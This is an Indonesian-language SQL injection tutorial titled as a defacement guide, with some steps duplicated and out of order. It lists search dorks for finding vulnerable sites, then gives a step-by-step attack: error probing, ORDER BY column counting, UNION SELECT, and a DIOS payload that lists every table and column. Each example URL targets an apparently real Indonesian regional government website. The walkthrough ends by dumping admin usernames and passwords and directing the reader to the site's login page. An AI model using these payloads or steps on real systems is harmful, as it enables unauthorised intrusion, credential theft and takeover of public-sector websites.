Tutorial - Cara SQL injection dengan Dios Lengkap
Keyword : SQLi With Dios, Dios SQL injection, SQLinjection Dios, Dios SQLinjection, Cara SQLi Dios, Tutorial SQLi Dios, Tutorial SQL injection Dios, Cara Deface SQL injection.
Dork :
Tutorial :
1.Cari Website yang memiliki kerentanan SQLinjection
2.Cek apakah website tersebut memiliki kerentanan SQLinjection (vuln) dengan menggunakan tanda petik (') diakhir angka pada url.
Contoh :
Ciri-ciri website mempunyai kerentanan SQL injection:
3.Melakukan Order By (Ketika melakukan perintah +order+by+1--+- kita akan mendapati tampilan normal)
inurl:specials.php?id=
Inurl:/products.php?id=
Inurl:/cart.php?id=
Inurl:/shop.php?id=
Inurl:/news.php?id=
inurl:/detail_berita.php?id=
Tutorial :
1.Cari Website yang memiliki kerentanan SQLinjection
2.Cek apakah website tersebut memiliki kerentanan SQLinjection (vuln) dengan menggunakan tanda petik (') diakhir angka pada url.
Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=31'
Ciri-ciri website mempunyai kerentanan SQL injection:
- You have an error in your SQL syntax;
- Warning: mysql_fetch_array()
- Bagian web ada yang hilang/blank
3.Melakukan Order By (Ketika melakukan perintah +order+by+1--+- kita akan mendapati tampilan normal)
Contoh :
4.Lakukan Perintah order by sampai mendapati situs error kembali
*Jika Error ada pada order by 7 berarti situs memiliki jumlah kolom sebanyak 6
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=31'+order+by+1--+-
4.Lakukan Perintah order by sampai mendapati situs error kembali
+order+by+1--+- > NORMAL
+order+by+2--+- > NORMAL
+order+by+3--+- > NORMAL
+order+by+4--+- > NORMAL
+order+by+5--+- > NORMAL
+order+by+6--+- > NORMAL
+order+by+7--+- > ERROR/BLANK
*Jika Error ada pada order by 7 berarti situs memiliki jumlah kolom sebanyak 6
5.Lakukan Union Select untuk mendapat angka injeksi
Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,4,5,6--+-
*Pada kasus ini angka yang dapat diinjeksi adalah 4 dan 5
Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,4,5,6--+-
*Pada kasus ini angka yang dapat diinjeksi adalah 4 dan 5
6.Masukkan Dios pada salah satu angka tersebut (saya menggunakan angka 5)
/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
Contoh :
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
,5,6--+-
7.Akan muncul Database dari website tersebut (Nama database Paling kiri), Nama yang ada ditengah itu Table,dan yang paling kiri alah Column. Untuk user dan password biasa berada di table admin
8.Lakukan Dump Database pada di Table t_admin (Tidak semua website sama)
Contoh:
https://bpbd.cianjurkab.go.id/contents/detail_berita.php?id=-31%27+union+select+1,2,3,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(t_admin)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),5,6--+-
Username dan password sudah didapatkan. Sekarang silahkan cari Halaman login pada website target